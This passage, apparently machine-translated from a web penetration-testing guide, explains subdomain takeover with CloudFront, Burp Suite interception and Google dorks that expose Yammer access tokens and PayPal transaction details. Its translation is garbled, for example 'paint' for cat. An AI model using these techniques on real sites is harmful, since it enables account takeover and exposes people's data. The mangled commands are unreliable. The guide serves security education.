a sub-domain of the target, in this section, the discussion will be carried out gradually matters
thing to do after finding a list of sub-domains in question, one of which is related to
sub-domain takeover.
6.1. The Basics of Sub-Domain Takeover
In summary, the sub-domain takeover is a trick that "allow" an Attacker
to take over a sub-domain belonging to the target due to the sub-domain is in-pointing
to third parties who "have" status expired. In other words, because the sub-domain has been in-
pointing a service that has expired (expired) the lease term, then this will be
allow someone to be able to take over the account referred to hire again.
The technique itself is told in detail by a company named Detectify and by a
Researchers named Patrik Hudak on their blog each.
6.2. Basic Concepts Sub-Domain Takeover
Figure 17 General Flow of Communication - https://0xpatrik.com/subdomain-takeover-basics/

Weather | 32
General communication when a user want to request an application to be displayed
a web browser that is as shown in FIG. Specifically, the breakdown is:
1. When users are trying to open an application through a web browser, the communication start
happens is that users will "talk to the DNS resolver": " Hello DNS resolver, please
give me the address of test.example.com ";
2. Received requests from users, the DNS resolver will try to contact the control point
example.com is located. From here, the DNS resolver will "communicate" with the DNS where
example.com: " Hello, please give me the address of test.example.com ";
3. Afterward, where example.com DNS will answer: " Hello, test.example.com turns
have (for example) CNAME that are pointing to prod.another.com, you try to contact him ";
4. When received such information, the DNS resolver will directly communicate to DNS
another.com place: " Hello, please give me the address of prod.another.com ";
5. When there are no longer pointing from prod.another.com, the DNS will another.com place
immediately replied: " Hello, address placed in 1.2.3.4 yah ";
6. After all the process is done, finally DNS resolver will reply to the user:
" hello user, IP address 1.2.3.4 in well ";
7. After getting the information that test.example.com addressed in IP 1.2.3.4, then the web
the browser will immediately visit the 1.2.3.4 server to request content;
8. And finally, the entire flow is closed with the presentation of the content server to the user 1.2.3.4
who has made the request again.
Then why DNS Resolver IP answer only while the user is actually requesting the
the form of a domain name?
Things to remember good is, specifically, only the IP numbering was used
to locate or determine the location of an application. However, because it
Our human will be difficult to remember so many numbers, it appears was a technology
DNS name that can be used to give a "naming" on each different IP or
The same IP even though with the aim of facilitating human in remembering "layout" of
an application (which can be invoked by the domain name).
In general situations, users can simply ask to inform the domain name so DNS
also reciprocates in the form of IP value.

Weather | 33
As a quick note, in its application, flow above can be stopped at number 3 (three)
with notes in point 3, the DNS immediately responded with an IP address (because not found
their pointing elsewhere). On the other hand, this flow can also continue onwards
CNAME until it ends at a point (CNAME it not be pointing to another CNAME).
After knowing the basic communication that happens, it would be easier to find
basic concepts in understanding the existing attack. In the application, taking sub-
domain (sub-domain takeover) is generally divided into three (3) identification, namely:
1. Seen in advance about the possibility of sub-domains belong to the target di- pointing to external
third party (third parties) domain or not.
In this case, the third party is a domain in a new domain name that can be made
public service domain sellers like cloudkilat, IDwebhost, the webmaster, Qwords, and
such.
Figure 18. Example Pointing to the External Domain
2. First see the possible use third party content provider such as Amazon Web
Service, Microsoft Azure, Heroku, fastly, and more.
For information, any one belonging to a content provider's business model is to provide
"Place" for any company can put any content hers in service
referred to without worrying about the infrastructure. This business model itself is developed further
by providing a unique sub-domain to companies / organizations that want
using his services. A simple example is like a sub-domain media.vine.co that
given the unique sub-domain name vines.s3.amazonaws.com ( which is certainly unique
This name can be set individually or automatically from the provider of such a2.bime.io which in-
pointing to bimeio.s3-website-us-east-1.amazonaws.com)

Weather | 34
Should be noted that services like Amazon and Microsoft Azure can also be
used as hosting that is not limited to put content such as images.
Figure 19 Example Pointing to 3rd Party Content Provider - https://hackerone.com/reports/121461
3. Second Order Sub-Domain.
In this case, second order sub-domains meaning that their use of third party
content in an application (can be a sub-domain of the primary domain and the domain
Another pulled his script) and it has not been ter manage well (generally associated
with broken-link hijacking). In the application, it has a point of execution that is not
far different from the description at number 1 and number 2, however, identification must
done by visiting the website in question and see "traffic" that drove it.
Figure 20 Sample Identification of Second-Order Sub-Domain

Weather | 35
6.3. Impact of Sub-Domain Takeover
It can be seen directly the impact of this attack is an attacker can
pretending to be part of the management system that can be used to take valid
belongs to the original user credentials.
For example, an attacker has taken over sub-domains belonging to XYZ. In situations
This, Attacker continue the existing scenario by creating a fake page that aims to
take the log data belonging to users / customers of the company XYZ. Given that the
seen by the user / customer is XYZ company's original domain in question, then of course
This attack can be an attack that has a fairly high success point.
In the other scenario, the attacker can exploit to execute such attacks CSRF
(Cross Site Request Forgery) which will be discussed in another section of this guide.
6.4. Step Execution Sub-Domain Takeover
After seeing some kind of sub-domain takeover, so on this occasion, the discussion will
dikerucutkan on the execution of each species present.
In general, information about the state of a sub-domain can be obtained by using
tools called "dig" which is built-in in almost every operating system Linux and OS X.
As a simple example, the following is the result of command execution dig against a sub-
Nokia's domain that addresses the nstring2qa.nokia.com.
# dig nstring2qa.nokia.com
Figure 21 Output of "dig" to the sub-domain nstring2qa.nokia.com

Weather | 36
In this situation, when a sub-domain has been transferred to a third party service, there will be
information that one of them is on the CNAME. From the picture, it appears that in fact sub-
owned domain nstring2qa.nokia.com transferred to api.nstringcms.com.
Things become simple question is how if it turns out there are so many sub-
domains that should be "seen" the situation? Certainly not possible to execute a tester
command "dig" one by one to each sub-domains exist.
To answer the questions, then the tester can use the command " xargs "who
generally used to read a stream of data from an input which is then executed
gradually in accordance with a given command.
For example, at one time, testers gained about 100 (one hundred) sub-domains belonging to target-
utama.com. However, given that not possible when typing the command "dig" the
one, the examiners also have to automate the execution of this dig that one of them can be done
with the command "xargs".
Things need to be done before was an examiner must first enter a list of sub-
domain who want to be seen "condition" to dig. In this situation, the list of sub-domains exist
entered into a file named " list_of_sub-domain.t xt "(without http: // or https: //).
# list_of_sub paint-domain.txt | xargs -n1 dig> output_from_dig.txt
Information:
• "paint" a command to read a file. In this situation, the file to be read
is " list_of_sub-domain.txt ";
• Each reading process is done, it will immediately "thrown" into dig. And this continues
often (automation) with the command xargs -n1;
• Once completed, all results will be incorporated into " output_from_dig.txt ".
When the execution has been completed, then proceed to retrieve information instantly with
command "grep" from the existing output. In this case, an example of which you want to "grep" is CNAME.
# paint output_from_dig.txt | grep CNAME> cname_output.txt
Information:

Weather | 37
• A reading of the file named "Output_from_dig.txt". This reading process
re-done " paint ";
• Then do the withdrawal of the information automatically to any outcome " dig "who
have a CNAME;
• After completion, the entire output is "written" automatically " cname_output.txt ".
Figure 22 Example of output when Viewed cname_output.txt
6.4.1. Execution of the External Pointing (TLD External Name) - Nokia Case
When it is to obtain information such as the CNAME, then the easiest thing is to look at
CNAME that are pointing to external domains. As one example, which is like the case of
Nokia follows.
In this situation, it was found that in fact the domain nstring2qa.nokia.com has been pointing to external
such domain api.nstringcms.com.
Figure 23: List of CNAME Output

Weather | 38
Figure 24 Dig Result to nstring2qa.nokia.com
When the check is performed against the domain nstringcms.com, This domain turns "available" for
purchased for other parties:
Figure 25 Domain is Available I
Figure 26 Domain is Available II

Weather | 39
When this domain was purchased and arranged so as to live, so automatically, when a
users access nstring2qa.nokia.com, open is the api.nstringcms.com page
has been prepared.
6.4.2. Execution of the External Pointing (Third Party Content Provider)
When it turns CNAME belonging to the target in-pointing to external services such as Amazon Web Services
or Microsoft Azure, then the search can is specified to the domain that is used by
such services. Here are a few types services have been mapped by
a researcher named Michael Henriksen which has the possibility of this related issue:
Amazon S3 (cloud storage) Instapage (Landing page platform)
Pingdom (Website and performance

Campaign Monitor (email marketing)
monitoring)
Cargo (Web publishing platform) Shopify (Ecommerce platform)
Cloudfront (Content Delivery Network) StatusPage (Status page hosting)
Desk (Customer service and helpdesk ticket

SurveyGizmo (Online survey software)
software)
Teamwork (Project management, help desk

Fastly (Content Delivery Network)
and chat software)
FeedPress (Feed analytics and Podcast hosting) Tictail (Social shopping platform)
Freshdesk (Customer support software and Tumblr (Microblogging and social
ticketing system) networking platform)
Teamwork (Project management, help desk

Ghost (Publishing platform)
and chat software)
Unbounce (Landing page builder and

GitHub Pages (GitHub static website hosting)
conversion marketing platform)
Help Scout (Customer service software and

UserVoice (Product management software)
education platform)
Helpjuice (Knowledge base software) WPEngine (WordPress blog hosting)
Zendesk (Customer service software and

Heroku (Cloud application platform)
support ticket system)

Weather | 40
When it is found that pointing to third-party content provider has not set well, then
there will be a display error which is certainly diverse. On this occasion, will try to be presented
about one of the findings of noobsec team against one of the sub-domains belonging to YCombinator ,
One of the sub-domains that are located in jobs.ycombinator.com turns in-pointing to CloudFront that
has not been set properly.
Figure 27 Cloudfront unregulated
Things need to be done when it finds such error display (of course, will vary when different
services) is to try to "claim" your existing services. Given that CloudFront
is part of the Amazon (for the service content delivery network), it can be entered into
Cloudfront Dashboard to create "distributions" new.
Figure 28 CloudFront Distributions - Create
Afterwards by selecting "get started" section "Web" to start setting.
Figure 29 "Get Started" with CloudFront Distributions section "Web"

Weather | 41
In the settings, select "set origin" to add a "bucket" account owner. If
not yet have a bucket, it can try to make ( "create") and upload ( "upload") file
, html simple as the main page. Here is an example of the settings:
Figure 30 Origin Settings
When it was set up, the input jobs.ycombinator.com at the CNAME to the "distribution
Settings "followed by selecting" create "and save.
Figure 31 Entering jobs.ycombinator.com into the CNAME
Figure 32 Configuration has been Saved
When all has been arranged in accordance with existing arrangements, so when a
users access the page "jobs.ycombinator.com", automatically the user will see
.html file pages that had been inserted at the beginning.

Weather | 42
Here is one example of how it looks:
Figure 33 Sub-Domain Takeover - Proof of Concept
Some other examples that can be used as a reference for similar issues, as follows:
• https://www.we45.com/blog/how-an-unclaimed-aws-s3-bucket-escalates-to-subdomain-
takeover : Sub-domain associated with the takeover via AWS S3 bucket that has not been claimed;
• https://blog.securitybreached.org/2018/09/24/subdomain-takeover-via-unsecured-s3-bucket/ :
sub-domain associated with the takeover via AWS S3 bucket that has not been claimed;
• https://0xpatrik.com/subdomain-takeover-starbucks/ : Sub-domain associated with the takeover on
Microsoft Azure services that have not been regulated properly;
• https://0xpatrik.com/takeover-proofs/ : Sub-domain associated with the takeover at some
services such as: Github, Amazon S3, Heroku, and Readme.io;
• https://hackernoon.com/subdomain-takeover-of-blog-snapchat-com-60860de02fe7 : Related
with a sub-domain takeover on service Tumblr.
6.4.3. Execution of the Second Order Domain
This section is actually not much different from the two sections has been described previously. On
This opportunity, things that made the difference is when found in a traffic there
the use of third party services other becomes part of the content in it (not
necessarily have to constitute a sub-domain of the primary domain).
For example, when trying to open the site example.com, it turns out there are sub-domains
subdomain.example.com are "called" by the intended application.
Figure 34 Sub-domains belonging to Example.com

Weather | 43
When traced, was a sub-domain called subdomain.example.com in-pointing to the service
3rd party such as an external domain or third party content providers are not regulated by
well (or not claimed) so of course the process of taking over this sub-domain will be referred to the
two previous explanations.
Should be noted that in practice, this is not always a sub-domain of the domain
The main, but may be content from other domains such as example.com interesting
the content of pihak-ketiga.com.
The worst of these uses is when it turns out the content drawn by the primary domain
is (not limited to) the javascript as shown in the previous image. because at
that situation, an attacker would be able to claim the sub-domain in question (if susceptible) and
insert malicious javascript that can be used for various purposes such as taking
cookies, forcing users to download malware, or other.
Figure 35 Second Order Sub-Domain - https://0xpatrik.com/second-order-bugs/
In the implementation, there are many ways that can be used to determine the "contents" of
a domain such as using the "developer tools" from the browser (such as Firefox) or
using traffic interceptor like Burp Suite.
6.5. Reference Sub-Domain Takeover
Given the discussion on this subject is quite a lot (and not too limited
CNAME), the Guidelines also summarized (from previous exposure) and include

Weather | 44
several other references that could be used to identify vulnerabilities associated sub-domains
existing takeover. As for some of which may be a reference is:
• Sub-domains Guide Takeovers: https://www.hackerone.com/blog/Guide-Subdomain-Takeovers
• Sub-domains Takeover Basics: https://0xpatrik.com/subdomain-takeover-basics/
• Broken Link Hijacking: https://edoverflow.com/2017/broken-link-hijacking/
• Sub-domains Takeover proofs (Github, Amazon S3, Heroku, and Readme.io):
https://0xpatrik.com/takeover-proofs/
• Sub-domains Takeover Principles: https://blog.sweepatic.com/subdomain-takeover-principles/
• Sub-domains Takeover at Starbucks (via Microsoft Azure): https://0xpatrik.com/subdomain-
takeover-starbucks /
• Sub-domains Takeover Detection with Aquatone: https://michenriksen.com/blog/subdomain-
takeover-detection-with-aquatone /
• Hostile Takeover Sub-domains using Heroku, GitHub, and more:
https://labs.detectify.com/2014/10/21/hostile-subdomain-takeover-using-herokugithubdesk-
more /
• Sub-domains Takeover on Jobsycombinator: https://noobsec.org/project/2018-11-06-
subdomain-takeover-on-jobsycombinator /
• How an unclaimed AWS S3 Bucket escalates to Sub-domain Takeover:
https://www.we45.com/blog/how-an-unclaimed-aws-s3-bucket-escalates-to-subdomain-
takeover
• Sub-domains Takeover via Unsecured S3 Bucket:
https://blog.securitybreached.org/2018/09/24/subdomain-takeover-via-unsecured-s3-bucket/
• Sub-domains Blog Takeover of Snapchat (via Tumblr): https://hackernoon.com/subdomain-
takeover-of-blog-com-60860de02fe7 Snapchat

Weather | 45
7. INTERCEPTOR & FORWARDER WEB TRAFFIC APPLICATION TOOLS
It is inevitable that one of the biggest parts that must be "faced" by testers when
want to "play" with a web-based application is a tool which can be used
as interceptor and forwarder against oncoming traffic data in an application (either
in the form of demand / request and response / response).
Surely circulated so many tools that can be used from that nature does not pay up
paid. OWASP ZAP and Burp Suite are two of the many well known among
the testers.
In order to facilitate discussion so that no branching, the Guidelines will be
refers to the use of Burp Suite as interceptor and forwarder tools.
7.1. The reason it needs Traffic Interceptor and Forwarder
It can be the opening of this section is a brief question, " How to
determine an application works from the perspective of front-end (or rather from the point
user point of view)? "
When a user opens and access features in an application, then the user
referred to only be able to see it flow by naked eye. For example, there is an application
which can be used to buy a pulse, then the groove commonly found are:
Selecting Selecting the Pulses are

Login to Menu wanted pulse about to
Application Purchase value Confirm Value
Pulse be bought be bought
Figure 36 Flow Pulse common to Purchase Confirmation
But to do a test, of course, in such a short groove is not enough to
supports the testing of a system. Armed with the use of tools that can be
used to re-intercept and forward a traffic, the test steps will
become more leverage and depth.
Here is an overview of the flow that can be seen by an examiner when he found a
applications with the same features as has been noted:

Weather | 46
View the ID or the

Login to Application identity of the selected
purchased
pulse value
Value Voucher to be
See Flow
Pulses are about to
Delivery
the Menu Confirm Value
Username and
Preferred Select be bought
password
Viewed ID or identity of
Reload Purchase
See Action performed

gain Selecting Menu
when confirmation is
session
done
Figure 37 Flow common to Purchase Confirmation Toll - with Traffic Interceptor
As a bit of a general description of this chart:
• Login to Application
As usual, when a user logs into the application with valid credentials, of course
the intended user will be taken directly to the dashboard from the users themselves.
However, an examiner will need a groove that runs when a credentials
is sent from the user to the server so that it can be a potential vulnerability that could
produced such as SQL Injection and others.
• Obtaining Session
Session is one thing that is quite a lot of interest for the testers
there is potential to jump into another user's account without having to know
username and / or password is used. Therefore, the formation of grooves in reading
a session when a user has logged in is something that is very necessary for
further study the application flow.
• Choose the Purchase Voucher Menu
At first glance, it appears there is no problem in this regard. But in reality, the examiner will require
groove that occurs when a menu is selected. The simple purpose is to look at the potential
the discovery of the hidden menus (eg menu is apparently only intended
by internal party application owner), the discovery of the possibility of the menu pointer parameter
injected, and others.

Weather | 47
• Choosing who want Purchased Toll Value
Not something that is not possible when in the credit purchase, there are a disability
in application code that allows a user purchases a high pulse value
with lower pay. To determine the potential This, of course, the testers also
the selection process requires the flow of available credit value which continued until the stage
purchase.
• And of course there are many more things that can be seen only from a simple flow alone.
Thus, it can be seen that the use of tools that are useful to re-intercept
or forward an application traffic on a thing difficult to separate from
testers. From this consideration the Guidelines also incorporate as one of the things that should be
known by the examiner.
7.2. Installing the JRE and Running Burp Suite
Burp Suite is one interceptor and forwarder data traffic generated web application
by PortSwigger Web Security. In the latest development, they have three versions of
the nature of the community (not paid), professional (paid), and enterprise. The best thing of
it is not mandatory testers use a paid version to be able to test or
traffic analysis of existing data on the application.
Community version of Burp Suite can be downloaded on the official portal that addresses PortSwigger
https://portswigger.net/burp/communitydownload , After the visit, there will be some
options such as direct download files that have been provided for each of the operating system
(Such as .exe or .dmg) or download format .jar (Java Archive).
Figure 38 Burp Suite Community Edition

Weather | 48
To homogenize the execution of the Guidelines, it will have a .jar format of Burp Suite.
When the .jar version has been downloaded, the examiner must make sure that the operating system
hers has been installed JRE (Java Runtime Environment). It is easiest to detect
by typing the command "java" in the command prompt (for Windows operating systems) or
terminal (on the operating system OS X or Linux). If not, then the examiner should download
first.
Given that the dynamic link for each version, the testers can try
enter keyword "Download JRE" first on Google to facilitate the acquisition of
link.
Figure 39 JRE Download - Keyword at Google
Thereafter, the examiner will be taken to the download page of the JRE that is in the official portal Oracle.
Certainly earned views will also vary which will be seen from the latest version of the JRE
when testers want to download it.
Figure 40 Page Official Portal Download JRE in Oracle

Weather | 49
In these situations, the examiner just simply choose in accordance with the following operating system used
the architecture of the operating system (for example, 32-bit or 64-bit).
Once finished downloading, then do the installation of the JRE in question and try typing the command
"Java" (lowercase) at the command prompt or terminal available. When you have installed
well, it will automatically sort out the "help" of the JRE itself.
Figure 41 Display JRE has been installed
When all goes well, then now go to the download directory where Burp Suite
located. Then continue by typing "java -jar nama_file_burp_suite.jar" like the following example:
Figure 42 Burp Suite has Walk

Weather | 50
Is there a way to simplify dialing summarily Burp Suite? Of course there is. examiner
just need to execute the .jar file that was downloaded and Burp Suite will run.
When Burp Suite is already open, then the examiner will be confronted with the view that is quite
solid (when I first saw it).
Figure 43 Burp Suite is Running
As a side note, remember this guide will not discuss about the use of Burp Suite
in depth, then the discussion will is specified to side clicking intercept and forward
traffic data from an application.
7.3. Intercept Traffic Data on Web-Based Applications - Track HTTP
The next thing to do is to open the tab "Proxy" (tab 2nd from left
above) and turn off the intercept mode first. When it dies, it looks like this:
Figure 44 Deadly Mode Intercept

Weather | 51
Continue to choose the sub-tab "options" on the "proxy.
From here, the examiner will see the "Proxy Listeners" can be used as an intermediary to
meng-intercept and forward a traffic.
Figure 45 Menu "Proxy Listeners"
Given that traffic from an application that is going to be accessed via a web browser will be
intercept, then switch the data traffic to IP (interface) to 127.0.0.1, Port 8080 (used
as a default by the Burp Suite, as shown in the picture). When it is so, then set the proxy
the browser to aim at the port in question.
To re-homogenize the situation, then this guide will discuss the process
proxy settings in Mozilla's browsers, namely Firefox.
In Firefox, go to " preferences "And type" proxy ". Afterwards choose " settings "," manual Proxy
Configuration ", And check" Use this proxy server for all protocols ".
Figure 46 Menu "Preferences" and "Settings"

Weather | 52
Figure 47 Proxy Settings
If so, then select "Ok" and try to open a portal to the HTTP (without the "S"). As an example,
portal which opened on this occasion is the link: http://testphp.vulnweb.com ,
When you have successfully opened, then automatically, the traffic will be "caught" by the Burp Suite as
the following picture:
Figure 48 Catch Traffic Data via Burp Suite
So what if it wants to open a portal that uses the HTTPS path? of course
There are a few tricks to be done. Because if done only step that has been
exposed, it would appear the error display in the browser.

Weather | 53
Figure 49 Connection is Failed
7.4. Intercept Traffic Data on Web-Based Applications - Track HTTPS
The main reason their web-based application that uses HTTPS path failure messages
when going in-intercept with Burp Suite is because basically, Burp Suite has
using its own certificate.
By default, when you browse via an HTTPS website Burp, the Proxy generates an SSL certificate for
each host, signed by its own Certificate Authority (CA) certificate. This CA certificate is generated the
Burp is a run first time, and stored locally. - PortSwigger ,
When users use a certificate belonging to another and then tries to connect to a valid certificate
of applications (eg GlobalSign by Google), it will exit the error because the user
such consideration is being "attacked".
In anticipation of this, the examiners are required to install the certificate of Burp Suite
firstly as a "trusted root" on the browser being used (or at the level of the operating system
when they wanted to use Microsoft Edge or Google Chrome).
The starting point is, go to the link http: // burp without the addition of any words.
Figure 50 Accessing http: // burp

Weather | 54
Continue by downloading the certificate belongs to Burp Suite by visiting the option "CA
Certificate "in the upper right.
Figure 51 Download CA Certificate
Afterwards, the "import" of this certificate to the browser to go to "preferences" and continued
by typing "cert".
Figure 52 Menu "Certificates" in Firefox
When it is finished, then go to " view Certificates "And on the" Authorities "Select button
" import ". Then, select cacert.der that have been downloaded on the page http: // burp then.
Figure 53 Import Certificate belonging to Burp Suite in the Browser

Weather | 55
Next, check the two options, and select the "Ok" to complete.
Figure 54 Trust Certificate at Browser
If the entire configuration is correct, then it should be there is a name " PortSwigger "Tab
" Authorities " in the " Certificate Name ".
Figure 55 "View Certificates" at Browser
When finished, so now continue with the opening https://google.com and look at the
"Intercept" to the "Proxy" in Burp Suite. If it has been ter-intercept, all these measures have been successful.
Figure 56 Opening the Google of Certificate belonging to Burp Suite

Weather | 56
Figure 57 HTTPS Traffic on the Strip has been successfully intercept
7.5. Burp Suite Installation Reference CA on Multiple Browsers
Here are a few references that could be a reference to complete explanation
which exists:
• Installing Burp's CA certificate:
https://portswigger.net/burp/documentation/desktop/tools/proxy/options/installing-ca-
certificate
• Installing Burp Suite CA Certificate in Firefox:
https://support.portswigger.net/customer/portal/articles/1783087-installing-burp-s-ca-
certificate-in-firefox
• Installing Burp's CA Certificate in Chrome:
certificate-in-chrome
• Installing Burp's CA Certificate in Chrome on Linux:
certificate-in-chrome-on-linux

Weather | 57
8. CONCEPT BASIC METHOD IN HTTP GET AND POST
Before proceeding further, it would be good if the examiners understand the basic concepts of
method with the HTTP GET and HTTP POST.
The most basic thing that will be encountered someone while inputting-kan of the data on the form
available in an application is no data appears in the URL (link change with the data
in-input) and there is no way to show changes to the URL. Both of these
is a normal thing to be found and not be a big problem.
However, it is still discussed because there will be parts that are fairly common in
in this guide.
When a link is dynamic ( change in accordance with the data-input), it can be
concluded that the request process is done GET Method. The most simple example
often encountered is when we want to input-kan said the search feature (search).
Figure 58 Sample of GET Method
In the picture above, it appears that the user has included the words "Insecure Direct Object
Reference "in the search feature. And on the related circumstances, the words included are reflected
the URL so that the URL has changed. This condition is called as a GET method.
Because the URL is changed according to the user input.
When viewed in detail at any interceptor tools, these changes also appear on the URL alone.
Figure 59 Sample GET Request with Method

Weather | 58
As for when a link static ( not change even if the given input vary), then
it can be concluded that the request process is done POST Method. The example most often
encountered (by no means all) on the login form in an application. When the user has
enter his username and password, then the URL will not reflect the input of usernames
and password in question.
As examples of applications that can be tested by visiting link on
http://testphp.vulnweb.com/login.php and enter the username and password are not valid.
Figure 60 Sample Login Form POST Method
Each failure, then the link will not change. And every successful, it will be taken to a page
a different dashboard. However, when considered in detail at the interceptor tools, it would seem
that the actual username and password request form was still there, but not located in
URL.
Figure 61 Sample Request POST Method
In the course of testing, the examiners certainly meet with various forms
request either GET or POST. Even in other circumstances, would meet another method
like PUT, DELETE, and more.

Weather | 59
9. INFORMATION DISCLOSURE VIA SEARCH ENGINE
Once you know and understand the different stages of a simple reconnaissance between GET and
POST method, then the discussion will be referred to the merger of the two terms thus to seek
sensitive information that may exist in the application.
A simple question to open this discussion is "how exactly a search
engine works within reach (collect / gather) the data? "
quoting from simple article issued by dummies.com , There are two general stages
carried out, namely:
1. To meet the needs of "Search Engine" in clicking gather data, it was exercised an
automated process (known as spidering) for constantly crawling
against "world" Internet. The goal is simple, that tried to gather data on the page
web to a server owned by the Search Engines.
"Spider" itself has a lot of the kind that would have its main office to its owner, as
examples are Google's spider named as Google Bot, Microsoft with BingBot,
DuckDuckGo with DuckDuckBot, and more.
For information, in reality, the mention of this spider could also be known by the name
robot, bot, or crawler. And to make a search engine can index
display / new data in an application, it will take its own time capable
reached a few days (which is one of its factors seen from the levels of the data visitor
itself).
2. The second thing to do is to try to re-index all the data obtained from
The first stage in order to make the data into data that can be used by the user.
For example, each vendor will create their own algorithms that will decide
views required by users when they want to find something with the keyword
certain.
By looking at the concept of search engines work in the crawling of existing data
on the application, it can be ascertained that the search engine is "not concerned" about
the type of data. And it is this that is going to be discussed in one way grabbed information (
even sensitive), namely by using search engines.

Weather | 60
9.1. Discussion Technique - First Case - Yammer Case
In general, it is not certain that an industrial application using GET A Sure Method
or vice versa. However, when there is data that is thrown in the form of the GET Method
not accompanied by protection of the crawlers of search engines, it would appear
is possible if the data can be drawn.
One simple example of interest is related to the issue on Yammer (a social
Microsoft's network is allocated to the Corporate / Enterprise) found
2013. At that time, a researcher named Ateeq Khan managed to find vulnerabilities
allowing her to enter into an account without having to know the username
and the password used by the victim.
Yes, the technique used is in accordance with this discussion. Ateeq take advantage of a mistake
configuration on Yammer application that has not prevented the bot's crawling of data
GET sensitive melajut in his method.
Long story short, Yammer has an API that is used to authorize a
user in opening the message (the message). This API has basically been accompanied by a parameter
"Access_token" which acts as an identity for authentication. But unfortunately, the API
is not well protected so that with a little amount of keywords in search engines,
Ateeq managed to enumerate some access_token that of course this makes him able to login
into each account that appears on the search engine.
For example, a user X has access_token value NPLpzPsWdtCeXaKxBGA the di-
automatically generated by Yammer. In order to make the user A is authorized to open
the message that goes into it, then the user is automatically acquire and
visit links that have been accompanied by value from access_token hers:
https://www.yammer.com/api/v1/messages?access_token=NPLpzPsWdtCeXaKxBGA
When another user (say Z) managed to get the link in question is also, it is
automatic, this Z users will immediately be able to sign into accounts belonging to users X.
Then the question is, how do I get a link Ateeq referred from search engines?
Pretty simple. It is seen that there is a parameter "access_token" in the link (URL). Then
a tester can use "Google Dork" (to be discussed later) which consists of a simple
Special search of links yammer.com and special search on the keyword
"Access_token" that exist in the URL. Here's a picture:

Weather | 61
• Google Dork "Site:" is used to search specifically for information derived from
link included.
• Google Dork "inurl:" is used to search for specific keywords (as specific as written) that
may come from links that you have or not is determined by dork like "site:" operator.
The summary is:
site: yammer.com AND inurl: 'Access_token'
General description to simplify this explanation is testers want to find the whole thing
No parameters "access_token" in the URL (GET Method) links Yammer.com belongs.
Afterwards, Ateeq gain some links from Google that can be visited directly. false
them is https://www.yammer.com/api/v1/messages?access_token=NPLpzPsWdtCeXaKxBGA ,
When accessed, the display will appear in the form of XML.
Figure 62 Display XML when Accessing
Things need to be done to ensure this is to visit one of the links
show on XML authorization referred to later obtain automatically to existing users.

Weather | 62
Figure 63 Accessing Another User Account
In summary, it can be concluded that without providing protection against the method
has been set, it is possible that when a tester can extract sensitive data on
an application can then proceed to either login illegally (as an example
this) or the other.
9.2. Google Dork Glance
Quoted from TechTarget, Google Dork (sometimes simply referred to as Dork) is a collection of
string (text) search which is used to perform a search in advance. Generally this
performed to obtain results that are not readable in general in an application.
In the same article, said that users can search for information that is difficult to search
(In general) only by entering a simple query.
"That description includes information that is not intended for public viewing but that has not been
adequately protected. "
As a complement to the information, some simple things that can be used in relation to this dork is
like site and inurl (described previously), type, index, and intext. To see
More details will dork useful to conduct an examination, then testers can refer
Reviewed exploit-db.com sites that store a lot of information will be "Google Hacking Database" ,

Weather | 63
9.3. Discussion Techniques - Second Case - Case PayPal
In the second case, it will be discussed on a similar issue occurred on Yammer yet
PayPal. In contrast to the Yammer that allows a tester can go directly to
in an account belonging to someone, in the example issue that occurred in 2017 and then, one can only
enumerate some general transaction data that occurs between users each
more ,
In general, when a user on PayPal wants to send money to a user account
another, then PayPal will send some parameters that are packed in the GET Method.
https://www.paypal.com/signin/?country.x=US&locale.x=en-
US & returnUri = https: //www.paypal.com/myaccount/transfer/send/external? recipient = (victim_e
mail_address) & amount = 1000.00 & CURRENCYCODE = USD & payment_type = Gift & onboardData = { " inte
nt ":" sendMoney "," recipient ":" ( victim_email_address) "," currency "," $ "," amount ":" 1000.00 "," redir
ect_url ":" https://www.paypal.com/myaccount/transfer/send/external? recipient = (victim_email_a
ddress) & amount = 1000.00 & CURRENCYCODE = USD & payment_type = Gift "," flow ":" p2p "," country ":" US
"," Locale ":" en-US "," sendMoneyText ":" Custom message, for example is sending a money to
victim_email_address "}
From the looks, some of the parameters passed are:
• recipient: the recipient's email address money is about to be transferred
• Amount: is value for money to be sent
• currenyCode: is the currency used
• payment_type: is a type of payment can be a gift (gift)
• sendMoneyText: is a text that can be used to provide the user
information regarding remittances referred
Just like in the story of Yammer, on this occasion, the examiner was quite uses Google dork
to be able to obtain some information in the form of things "had happened" from a
PayPal users to other users.
A simple example:
site: paypal.com AND inurl: ' payment_type = '

Weather | 64
site: paypal.com AND inurl: intent
site: paypal.com AND inurl: ' sendMoneyText '
site: paypal.com AND inurl: ' recipient = '
site: paypal.com AND inurl: CURRENCYCODE =
site: paypal.com AND inurl: onboardData =
site: paypal.com AND inurl: sendMoney
site: paypal.com AND inurl: ITEM_NAME
site: paypal.com AND inurl: counterparty
For the record, the use of single quotes ( among keyword), then together with ( after
keyword), or use both of them, does not matter. Based on the test results, all of them
can have different outputs.
Here is one example of execution with the use of the keyword "sendMoneyText".
Figure 64 Trying to Take Another User Information
And multiple outputs from a few experiments with different keywords as follows:
Example enumeration with the keyword " recipient ":
• Recipient = board@silverxxxxxxxx.com ; amount = 325 USD; sendMoneyText = Sending
board@silverxxxxxxxx.com ; payment_type = Gift

Weather | 65
• Recipient = islandxxxxxxxxx@gmail.com ; amount = 10 USD; sendMoneyText = Sending
islandxxxxxxxxx@gmail.com ; payment_type = Gift
Example enumeration with the keyword " CURRENCYCODE ":
• Recipient = airxxxxx@xxxxx.com ; amount = 20 USD; sendMoneyText = Sending
airxxxxx@xxxxx.com ; payment_type = Gift
• Recipient = hello@skyxxxxxxxxxxx.com ; amount = 245 USD; sendMoneyText = Sending
hello@skyxxxxxxxxxxx.com ; payment_type = Gift
Example enumeration with the keyword " recipient = '( the same as):
• Recipient = tablxxxxxxx@yahoo.com ; amount = 308 USD; sendMoneyText = Sending
tablxxxxxxx@yahoo.com ; payment_type = Gift
• Recipient = dax@daxxxxxx.com ; amount = 30 USD; sendMoneyText = Sending
dax@daxxxxxx.com ; payment_type = Gift
Example enumeration with the keyword " sendMoneyText ":
▪ paypalme = paypalme / xxxxxxxxx; amount = 200 USD; sendMoneyText = You are sending Ahmed xxxxxxx US $ Â
200.00; locale = ar_EG
• paypalme = paypalme / xxxxxxx; amount = 6 USD; sendMoneyText = You are sending Jatin xxxxx $ 6:00; locale =
en_US
And on a similar occasion, also found a way to take ownership of another user invoices
without having to perform authentication and authorization:
Figure 65 Trying Enumeration Invoice

Weather | 66
Figure 66 Example One Invoice Accessed
Thus, it is seen and proved that one can take the data (sensitive) of
an application that was not doing the right configuration to prevent the presence of "crawlers"
of a bot on search engines.
9.4. Discussion Techniques - Third Case - Case Trello
